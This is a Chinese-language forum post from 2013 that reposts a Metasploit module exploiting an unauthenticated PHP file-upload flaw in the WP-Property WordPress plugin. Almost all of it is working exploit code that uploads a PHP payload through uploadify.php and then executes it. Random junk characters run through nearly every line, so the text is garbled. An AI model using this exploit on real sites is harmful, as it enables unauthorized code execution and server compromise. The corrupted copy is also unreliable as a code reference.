WordPress WP-Property PHP 文件上传漏洞, [2 R" b0 Z4 m" Y- U o9 K
# J' N0 o1 K6 G2 }& H
## # This file is part of the Metasploit Framework and may be subject to
6 G6 H( u6 ~, s
& F0 c$ D& K3 B2 f/ a# redistribution and commercial restrictions. Please see the Metasploit% y: h* G, z3 z
0 {, O, _, S m1 e) S/ Y" V# Framework web site for more information on licensing and terms of use.
" |% w# `# q! I7 P/ F7 K
4 r. r9 [ I) O# http://metasploit.com/framework/ ##4 V- T, \0 Y" f9 x
5 W& }% i: l$ J" u; `- R
! I$ r' d+ p1 J. N# x+ h+ q3 c. ^# w; Z, A$ t5 H' _- D$ u
; B" R* E+ G% f" \! {7 A A( I1 _. a8 N
require 'msf/core'
6 P# U) n& R7 r5 B3 s' t4 lrequire 'msf/core/exploit/php_exe'2 p* B. B6 [+ ^( X+ x
/ N# ?9 J0 D' Yclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
: Z1 M$ e Q) u" j( e'Description' => %q{$ B" K) i1 Y; `
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
3 a! d( P$ Z7 D. p6 V7 K) p[; F8 s8 ^2 \0 Q4 }- l
'Sammy FORGIT', # initial discovery
. H7 v+ y2 J+ l3 Q/ h'James Fitts <fitts.james[at]gmail.com>' # metasploit module
9 d6 _# h) ]2 q: c+ K {9 ^],0 V& T3 T; W7 U! p0 _8 i3 e1 \
'License' => MSF_LICENSE, D# Y3 ?1 F ` e: ]
'References' =>
4 L, g$ ~' k2 j- [# F[. D: G- r- j5 u( B E& W4 c
[ 'OSVDB', '82656' ],+ {2 b# S y% w9 `0 E
[ 'BID', '53787' ],! {! i$ V0 m# u
[ 'EDB', '18987'],
' D" T4 J/ d# y' m1 ?$ D[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]9 @; w/ ]" y R6 X) b
],9 H& c" {' z" m& ]8 Z2 U% }
'Payload' =>
3 `* n7 Z. \$ |6 ~! u% y4 y{
1 r1 Y! ^! ]6 }' O a1 _; f9 V'BadChars' => "\x00",6 P* d' B( G4 I& G
},: _: P M* l8 |3 K3 _
'Platform' => 'php',
5 N8 \5 V7 H3 d8 ?9 B* Z: @8 z'Arch' => ARCH_PHP,
+ w" H+ _2 k+ W& C'Targets' =>
6 S. v9 c8 q$ |- N% w; }; h# j[3 X6 K' G. R3 @- I6 X% s6 _3 g
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
; q# X% V2 Z j' ?' @: ?/ K[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
2 B4 T# Y. V W, K$ x],
9 d( }! c8 u0 ~- O'DefaultTarget' => 0,: w& {% t) H3 x' z, A
'DisclosureDate' => 'Mar 26 2012'))
c5 D3 L2 \' Q: H2 w$ e7 q" z; n" M0 o& z/ M9 M; I
register_options(
, e" c. _/ T& t3 P* T[- R( X: {& G3 b# U: o
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
% N( s( @3 |9 c], self.class): a9 y: e4 z- I1 p0 {$ x! e1 ?
end0 i9 @) I5 Z+ ~' n
& z0 ]5 {' \3 d9 gdef check" x1 ]; K# T) ?& s5 W6 f
uri = target_uri.path
" i0 N: g' N* w( Zuri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',2 ~* {) m5 O, }3 H. d, |) q u' c
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"4 P" `# }% }( {4 m
})# v. T. q7 U# s7 L( [
( R7 L# M( T zif not res or res.code != 200
) @! e; V! c, j2 mreturn Exploit::CheckCode::Unknown$ z0 N. F4 ?, c: M
end
$ n& F7 T& j& _9 r: C8 f8 e6 ?# G& c x( |% p
return Exploit::CheckCode::Appears7 Y" ~6 v- [/ j& @2 L! S
end$ G L& i0 k0 {5 Q$ C8 a
+ r$ p0 T# o6 M) t: o4 |7 }
def exploit, c: q, T" @- a' d: u
uri = target_uri.path7 C1 `3 `% ? ]% n- W* b, Z2 {
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)7 v1 e1 _" {0 v! X
1 l$ X9 [+ G6 z0 i+ b' K8 q! zdata = Rex::MIME::Message.new/ z& I$ @- i7 r: U, ~, V
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
/ S/ {6 M, |$ f8 edata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")" B# V; |$ S% O) Z+ r! I4 O
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
, v9 ^4 x- W& R" g$ F2 @( u
2 R3 O" z" v' `0 v: H: m4 n7 tprint_status("#{peer} - Uploading payload #{@payload_name}")6 N7 x7 E4 K3 V* I! D
res = send_request_cgi({
- ~; }. L+ |* @" S+ t4 J'method' => 'POST',/ D# A' `/ O$ f# R& ^
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",+ C8 I& k. p4 N' ~+ l$ i3 ^& _
'ctype' => "multipart/form-data; boundary=#{data.bound}"," h& J$ z9 Y+ X( v4 D& W
'data' => post_data( d3 R t1 b+ d4 ]0 O& k/ z% o2 U: J- L
})2 K! l7 q u) O- l; } O- C; \/ C
& M2 v5 g5 S; B5 v( @9 U& jif not res or res.code != 200 or res.body !~ /#{@payload_name}/
) v* H( {+ _2 a K$ j2 Z, C* Ofail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed"). X- c) T: [/ P
end# t" R! q* I. C3 a% \( m
/ T8 y% v: z4 u, }9 B
upload_uri = res.body
! g7 D' m0 N! v: @" x/ ]
! }% g4 r" K& W' ^: Nprint_status("#{peer} - Executing payload #{@payload_name}")$ c4 X# K4 O7 l8 N$ S" Z1 g$ z
res = send_request_raw({1 F) s/ \1 u! Y& r% S
'uri' => upload_uri,: F# Z4 G% E" l% P1 n
'method' => 'GET'
0 Q c% b0 S4 _0 K/ @})1 Z% B6 G6 T" d, j. |4 \+ q
end
: _! m; m: R9 A6 ~& O2 Cend5 p4 C+ B9 H) Q3 E0 n0 j) h
8 A# `3 u# u" F- U不要问我这写的是什么 怎么利用 我是说msf.& Q, {. q7 k8 y5 K6 J
3 D5 ~# A8 d% r) Y* {( f
|
发表于 2013-1-4 19:51:30
收藏
支持
反对